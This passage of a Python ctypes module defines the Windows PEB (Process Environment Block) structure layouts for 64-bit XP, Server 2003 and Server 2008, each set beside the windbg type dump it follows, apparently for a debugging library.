        ("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
        ("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
        ("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
        ("MinimumStackCommit", DWORD),
    ]
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 SpareBits : Pos 1, 7 Bits
# +0x008 Mutant : Ptr64 Void
# +0x010 ImageBaseAddress : Ptr64 Void
# +0x018 Ldr : Ptr64 _PEB_LDR_DATA
# +0x020 ProcessParameters : Ptr64 _RTL_USER_PROCESS_PARAMETERS
# +0x028 SubSystemData : Ptr64 Void
# +0x030 ProcessHeap : Ptr64 Void
# +0x038 FastPebLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x040 AtlThunkSListPtr : Ptr64 Void
# +0x048 SparePtr2 : Ptr64 Void
# +0x050 EnvironmentUpdateCount : Uint4B
# +0x058 KernelCallbackTable : Ptr64 Void
# +0x060 SystemReserved : [1] Uint4B
# +0x064 SpareUlong : Uint4B
# +0x068 FreeList : Ptr64 _PEB_FREE_BLOCK
# +0x070 TlsExpansionCounter : Uint4B
# +0x078 TlsBitmap : Ptr64 Void
# +0x080 TlsBitmapBits : [2] Uint4B
# +0x088 ReadOnlySharedMemoryBase : Ptr64 Void
# +0x090 ReadOnlySharedMemoryHeap : Ptr64 Void
# +0x098 ReadOnlyStaticServerData : Ptr64 Ptr64 Void
# +0x0a0 AnsiCodePageData : Ptr64 Void
# +0x0a8 OemCodePageData : Ptr64 Void
# +0x0b0 UnicodeCaseTableData : Ptr64 Void
# +0x0b8 NumberOfProcessors : Uint4B
# +0x0bc NtGlobalFlag : Uint4B
# +0x0c0 CriticalSectionTimeout : _LARGE_INTEGER
# +0x0c8 HeapSegmentReserve : Uint8B
# +0x0d0 HeapSegmentCommit : Uint8B
# +0x0d8 HeapDeCommitTotalFreeThreshold : Uint8B
# +0x0e0 HeapDeCommitFreeBlockThreshold : Uint8B
# +0x0e8 NumberOfHeaps : Uint4B
# +0x0ec MaximumNumberOfHeaps : Uint4B
# +0x0f0 ProcessHeaps : Ptr64 Ptr64 Void
# +0x0f8 GdiSharedHandleTable : Ptr64 Void
# +0x100 ProcessStarterHelper : Ptr64 Void
# +0x108 GdiDCAttributeList : Uint4B
# +0x110 LoaderLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x118 OSMajorVersion : Uint4B
# +0x11c OSMinorVersion : Uint4B
# +0x120 OSBuildNumber : Uint2B
# +0x122 OSCSDVersion : Uint2B
# +0x124 OSPlatformId : Uint4B
# +0x128 ImageSubsystem : Uint4B
# +0x12c ImageSubsystemMajorVersion : Uint4B
# +0x130 ImageSubsystemMinorVersion : Uint4B
# +0x138 ImageProcessAffinityMask : Uint8B
# +0x140 GdiHandleBuffer : [60] Uint4B
# +0x230 PostProcessInitRoutine : Ptr64 void
# +0x238 TlsExpansionBitmap : Ptr64 Void
# +0x240 TlsExpansionBitmapBits : [32] Uint4B
# +0x2c0 SessionId : Uint4B
# +0x2c8 AppCompatFlags : _ULARGE_INTEGER
# +0x2d0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x2d8 pShimData : Ptr64 Void
# +0x2e0 AppCompatInfo : Ptr64 Void
# +0x2e8 CSDVersion : _UNICODE_STRING
# +0x2f8 ActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x300 ProcessAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x308 SystemDefaultActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x310 SystemAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x318 MinimumStackCommit : Uint8B
# +0x320 FlsCallback : Ptr64 Ptr64 Void
# +0x328 FlsListHead : _LIST_ENTRY
# +0x338 FlsBitmap : Ptr64 Void
# +0x340 FlsBitmapBits : [4] Uint4B
# +0x350 FlsHighIndex : Uint4B
class _PEB_XP_64(Structure):
    """PEB layout for 64-bit Windows XP, following the windbg "dt _PEB"
    dump in the comments above. Pointer-sized fields use PVOID/QWORD so
    the struct is only correct when this module runs as a 64-bit process.

    Overlaid on memory read from a target process — do not reorder,
    rename, or retype members.
    """
    _pack_ = 8
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("BitField", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID), # PPEB_LDR_DATA
        ("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID), # PRTL_CRITICAL_SECTION
        ("AtlThunkSListPtr", PVOID),
        ("SparePtr2", PVOID),
        ("EnvironmentUpdateCount", DWORD),
        ("KernelCallbackTable", PVOID),
        ("SystemReserved", DWORD),
        ("SpareUlong", DWORD),
        ("FreeList", PVOID), # PPEB_FREE_BLOCK
        ("TlsExpansionCounter", DWORD),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("ReadOnlySharedMemoryHeap", PVOID),
        ("ReadOnlyStaticServerData", PVOID), # Ptr64 Ptr64 Void
        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", DWORD),
        ("NtGlobalFlag", DWORD),
        ("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
        ("HeapSegmentReserve", QWORD),
        ("HeapSegmentCommit", QWORD),
        ("HeapDeCommitTotalFreeThreshold", QWORD),
        ("HeapDeCommitFreeBlockThreshold", QWORD),
        ("NumberOfHeaps", DWORD),
        ("MaximumNumberOfHeaps", DWORD),
        ("ProcessHeaps", PVOID), # Ptr64 Ptr64 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", DWORD),
        ("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", DWORD),
        ("OSMinorVersion", DWORD),
        ("OSBuildNumber", WORD),
        ("OSCSDVersion", WORD),
        ("OSPlatformId", DWORD),
        ("ImageSubsystem", DWORD),
        ("ImageSubsystemMajorVersion", DWORD),
        ("ImageSubsystemMinorVersion", DWORD),
        ("ImageProcessAffinityMask", QWORD),
        ("GdiHandleBuffer", DWORD * 60),
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", PVOID),
        ("TlsExpansionBitmapBits", DWORD * 32),
        ("SessionId", DWORD),
        ("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
        ("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
        ("pShimData", PVOID),
        ("AppCompatInfo", PVOID),
        ("CSDVersion", UNICODE_STRING),
        ("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
        ("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
        ("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
        ("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
        ("MinimumStackCommit", QWORD),
        ("FlsCallback", PVOID), # Ptr64 Ptr64 Void
        ("FlsListHead", LIST_ENTRY),
        ("FlsBitmap", PVOID),
        ("FlsBitmapBits", DWORD * 4),
        ("FlsHighIndex", DWORD),
    ]
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 SpareBits : Pos 1, 7 Bits
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 AtlThunkSListPtr : Ptr32 Void
# +0x024 SparePtr2 : Ptr32 Void
# +0x028 EnvironmentUpdateCount : Uint4B
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 SpareUlong : Uint4B
# +0x038 FreeList : Ptr32 _PEB_FREE_BLOCK
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 ReadOnlySharedMemoryHeap : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ImageProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x1fc ProcessAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x200 SystemDefaultActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x204 SystemAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x208 MinimumStackCommit : Uint4B
# +0x20c FlsCallback : Ptr32 Ptr32 Void
# +0x210 FlsListHead : _LIST_ENTRY
# +0x218 FlsBitmap : Ptr32 Void
# +0x21c FlsBitmapBits : [4] Uint4B
# +0x22c FlsHighIndex : Uint4B
class _PEB_2003(Structure):
    """
    PEB structure for 32 bit Windows Server 2003.

    The field layout follows the windbg type dump reproduced in the
    comment block directly above this class.
    """
    _pack_ = 8
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("BitField", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID),  # PPEB_LDR_DATA
        ("ProcessParameters", PVOID),  # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("AtlThunkSListPtr", PVOID),
        ("SparePtr2", PVOID),
        ("EnvironmentUpdateCount", DWORD),
        ("KernelCallbackTable", PVOID),
        ("SystemReserved", DWORD),
        ("SpareUlong", DWORD),
        ("FreeList", PVOID),  # PPEB_FREE_BLOCK
        ("TlsExpansionCounter", DWORD),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("ReadOnlySharedMemoryHeap", PVOID),
        ("ReadOnlyStaticServerData", PVOID),  # Ptr32 Ptr32 Void
        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", DWORD),
        ("NtGlobalFlag", DWORD),
        ("CriticalSectionTimeout", LONGLONG),  # LARGE_INTEGER
        ("HeapSegmentReserve", DWORD),
        ("HeapSegmentCommit", DWORD),
        ("HeapDeCommitTotalFreeThreshold", DWORD),
        ("HeapDeCommitFreeBlockThreshold", DWORD),
        ("NumberOfHeaps", DWORD),
        ("MaximumNumberOfHeaps", DWORD),
        ("ProcessHeaps", PVOID),  # Ptr32 Ptr32 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", DWORD),
        ("LoaderLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", DWORD),
        ("OSMinorVersion", DWORD),
        ("OSBuildNumber", WORD),
        ("OSCSDVersion", WORD),
        ("OSPlatformId", DWORD),
        ("ImageSubsystem", DWORD),
        ("ImageSubsystemMajorVersion", DWORD),
        ("ImageSubsystemMinorVersion", DWORD),
        ("ImageProcessAffinityMask", DWORD),
        ("GdiHandleBuffer", DWORD * 34),
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", PVOID),
        ("TlsExpansionBitmapBits", DWORD * 32),
        ("SessionId", DWORD),
        ("AppCompatFlags", ULONGLONG),  # ULARGE_INTEGER
        ("AppCompatFlagsUser", ULONGLONG),  # ULARGE_INTEGER
        ("pShimData", PVOID),
        ("AppCompatInfo", PVOID),
        ("CSDVersion", UNICODE_STRING),
        ("ActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("ProcessAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("SystemDefaultActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("SystemAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        # Fixed: was QWORD. The windbg dump above documents this field as
        # Uint4B at +0x208 with FlsCallback immediately after at +0x20c; an
        # 8-byte field (8-aligned under _pack_ = 8) would shift every later
        # field by 4 bytes. The sibling 32 bit structures (_PEB_2008,
        # _PEB_2008_R2) also declare it as DWORD.
        ("MinimumStackCommit", DWORD),
        ("FlsCallback", PVOID),  # Ptr32 Ptr32 Void
        ("FlsListHead", LIST_ENTRY),
        ("FlsBitmap", PVOID),
        ("FlsBitmapBits", DWORD * 4),
        ("FlsHighIndex", DWORD),
    ]
# The 64 bit Server 2003 PEB reuses the XP 64 bit definition, and the
# Server 2003 R2 definitions reuse the Server 2003 ones unchanged.
_PEB_2003_64 = _PEB_XP_64
_PEB_2003_R2 = _PEB_2003
_PEB_2003_R2_64 = _PEB_2003_64
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 AtlThunkSListPtr : Ptr32 Void
# +0x024 IFEOKey : Ptr32 Void
# +0x028 CrossProcessFlags : Uint4B
# +0x028 ProcessInJob : Pos 0, 1 Bit
# +0x028 ProcessInitializing : Pos 1, 1 Bit
# +0x028 ProcessUsingVEH : Pos 2, 1 Bit
# +0x028 ProcessUsingVCH : Pos 3, 1 Bit
# +0x028 ReservedBits0 : Pos 4, 28 Bits
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x02c UserSharedInfoPtr : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 SpareUlong : Uint4B
# +0x038 SparePebPtr0 : Uint4B
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 HotpatchInformation : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ActiveProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x1fc ProcessAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x200 SystemDefaultActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x204 SystemAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x208 MinimumStackCommit : Uint4B
# +0x20c FlsCallback : Ptr32 _FLS_CALLBACK_INFO
# +0x210 FlsListHead : _LIST_ENTRY
# +0x218 FlsBitmap : Ptr32 Void
# +0x21c FlsBitmapBits : [4] Uint4B
# +0x22c FlsHighIndex : Uint4B
# +0x230 WerRegistrationData : Ptr32 Void
# +0x234 WerShipAssertPtr : Ptr32 Void
class _PEB_2008(Structure):
    """
    PEB structure for 32 bit Windows Server 2008.

    The field layout follows the windbg type dump reproduced in the
    comment block directly above this class.
    """
    _pack_ = 8
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("BitField", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID),  # PPEB_LDR_DATA
        ("ProcessParameters", PVOID),  # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("AtlThunkSListPtr", PVOID),
        ("IFEOKey", PVOID),
        ("CrossProcessFlags", DWORD),
        ("KernelCallbackTable", PVOID),  # also UserSharedInfoPtr (union, see below)
        ("SystemReserved", DWORD),
        ("SpareUlong", DWORD),
        ("SparePebPtr0", PVOID),
        ("TlsExpansionCounter", DWORD),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("HotpatchInformation", PVOID),
        ("ReadOnlyStaticServerData", PVOID),  # Ptr32 Ptr32 Void
        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", DWORD),
        ("NtGlobalFlag", DWORD),
        ("CriticalSectionTimeout", LONGLONG),  # LARGE_INTEGER
        ("HeapSegmentReserve", DWORD),
        ("HeapSegmentCommit", DWORD),
        ("HeapDeCommitTotalFreeThreshold", DWORD),
        ("HeapDeCommitFreeBlockThreshold", DWORD),
        ("NumberOfHeaps", DWORD),
        ("MaximumNumberOfHeaps", DWORD),
        ("ProcessHeaps", PVOID),  # Ptr32 Ptr32 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", DWORD),
        ("LoaderLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", DWORD),
        ("OSMinorVersion", DWORD),
        ("OSBuildNumber", WORD),
        ("OSCSDVersion", WORD),
        ("OSPlatformId", DWORD),
        ("ImageSubsystem", DWORD),
        ("ImageSubsystemMajorVersion", DWORD),
        ("ImageSubsystemMinorVersion", DWORD),
        ("ActiveProcessAffinityMask", DWORD),
        ("GdiHandleBuffer", DWORD * 34),
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", PVOID),
        ("TlsExpansionBitmapBits", DWORD * 32),
        ("SessionId", DWORD),
        ("AppCompatFlags", ULONGLONG),  # ULARGE_INTEGER
        ("AppCompatFlagsUser", ULONGLONG),  # ULARGE_INTEGER
        ("pShimData", PVOID),
        ("AppCompatInfo", PVOID),
        ("CSDVersion", UNICODE_STRING),
        ("ActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("ProcessAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("SystemDefaultActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("SystemAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("MinimumStackCommit", DWORD),
        ("FlsCallback", PVOID),  # PFLS_CALLBACK_INFO
        ("FlsListHead", LIST_ENTRY),
        ("FlsBitmap", PVOID),
        ("FlsBitmapBits", DWORD * 4),
        ("FlsHighIndex", DWORD),
        ("WerRegistrationData", PVOID),
        ("WerShipAssertPtr", PVOID),
    ]

    # KernelCallbackTable and UserSharedInfoPtr overlap at the same offset
    # in the real PEB (both +0x02c in the dump above); this property
    # emulates that union by aliasing the KernelCallbackTable field.
    def __get_UserSharedInfoPtr(self):
        return self.KernelCallbackTable
    def __set_UserSharedInfoPtr(self, value):
        self.KernelCallbackTable = value
    UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x008 Mutant : Ptr64 Void
# +0x010 ImageBaseAddress : Ptr64 Void
# +0x018 Ldr : Ptr64 _PEB_LDR_DATA
# +0x020 ProcessParameters : Ptr64 _RTL_USER_PROCESS_PARAMETERS
# +0x028 SubSystemData : Ptr64 Void
# +0x030 ProcessHeap : Ptr64 Void
# +0x038 FastPebLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x040 AtlThunkSListPtr : Ptr64 Void
# +0x048 IFEOKey : Ptr64 Void
# +0x050 CrossProcessFlags : Uint4B
# +0x050 ProcessInJob : Pos 0, 1 Bit
# +0x050 ProcessInitializing : Pos 1, 1 Bit
# +0x050 ProcessUsingVEH : Pos 2, 1 Bit
# +0x050 ProcessUsingVCH : Pos 3, 1 Bit
# +0x050 ReservedBits0 : Pos 4, 28 Bits
# +0x058 KernelCallbackTable : Ptr64 Void
# +0x058 UserSharedInfoPtr : Ptr64 Void
# +0x060 SystemReserved : [1] Uint4B
# +0x064 SpareUlong : Uint4B
# +0x068 SparePebPtr0 : Uint8B
# +0x070 TlsExpansionCounter : Uint4B
# +0x078 TlsBitmap : Ptr64 Void
# +0x080 TlsBitmapBits : [2] Uint4B
# +0x088 ReadOnlySharedMemoryBase : Ptr64 Void
# +0x090 HotpatchInformation : Ptr64 Void
# +0x098 ReadOnlyStaticServerData : Ptr64 Ptr64 Void
# +0x0a0 AnsiCodePageData : Ptr64 Void
# +0x0a8 OemCodePageData : Ptr64 Void
# +0x0b0 UnicodeCaseTableData : Ptr64 Void
# +0x0b8 NumberOfProcessors : Uint4B
# +0x0bc NtGlobalFlag : Uint4B
# +0x0c0 CriticalSectionTimeout : _LARGE_INTEGER
# +0x0c8 HeapSegmentReserve : Uint8B
# +0x0d0 HeapSegmentCommit : Uint8B
# +0x0d8 HeapDeCommitTotalFreeThreshold : Uint8B
# +0x0e0 HeapDeCommitFreeBlockThreshold : Uint8B
# +0x0e8 NumberOfHeaps : Uint4B
# +0x0ec MaximumNumberOfHeaps : Uint4B
# +0x0f0 ProcessHeaps : Ptr64 Ptr64 Void
# +0x0f8 GdiSharedHandleTable : Ptr64 Void
# +0x100 ProcessStarterHelper : Ptr64 Void
# +0x108 GdiDCAttributeList : Uint4B
# +0x110 LoaderLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x118 OSMajorVersion : Uint4B
# +0x11c OSMinorVersion : Uint4B
# +0x120 OSBuildNumber : Uint2B
# +0x122 OSCSDVersion : Uint2B
# +0x124 OSPlatformId : Uint4B
# +0x128 ImageSubsystem : Uint4B
# +0x12c ImageSubsystemMajorVersion : Uint4B
# +0x130 ImageSubsystemMinorVersion : Uint4B
# +0x138 ActiveProcessAffinityMask : Uint8B
# +0x140 GdiHandleBuffer : [60] Uint4B
# +0x230 PostProcessInitRoutine : Ptr64 void
# +0x238 TlsExpansionBitmap : Ptr64 Void
# +0x240 TlsExpansionBitmapBits : [32] Uint4B
# +0x2c0 SessionId : Uint4B
# +0x2c8 AppCompatFlags : _ULARGE_INTEGER
# +0x2d0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x2d8 pShimData : Ptr64 Void
# +0x2e0 AppCompatInfo : Ptr64 Void
# +0x2e8 CSDVersion : _UNICODE_STRING
# +0x2f8 ActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x300 ProcessAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x308 SystemDefaultActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x310 SystemAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x318 MinimumStackCommit : Uint8B
# +0x320 FlsCallback : Ptr64 _FLS_CALLBACK_INFO
# +0x328 FlsListHead : _LIST_ENTRY
# +0x338 FlsBitmap : Ptr64 Void
# +0x340 FlsBitmapBits : [4] Uint4B
# +0x350 FlsHighIndex : Uint4B
# +0x358 WerRegistrationData : Ptr64 Void
# +0x360 WerShipAssertPtr : Ptr64 Void
class _PEB_2008_64(Structure):
    """
    PEB structure for 64 bit Windows Server 2008.

    The field layout follows the windbg type dump reproduced in the
    comment block directly above this class.
    """
    _pack_ = 8
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("BitField", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID),  # PPEB_LDR_DATA
        ("ProcessParameters", PVOID),  # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("AtlThunkSListPtr", PVOID),
        ("IFEOKey", PVOID),
        ("CrossProcessFlags", DWORD),
        ("KernelCallbackTable", PVOID),  # also UserSharedInfoPtr (union, see below)
        ("SystemReserved", DWORD),
        ("SpareUlong", DWORD),
        ("SparePebPtr0", PVOID),
        ("TlsExpansionCounter", DWORD),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("HotpatchInformation", PVOID),
        ("ReadOnlyStaticServerData", PVOID),  # Ptr64 Ptr64 Void
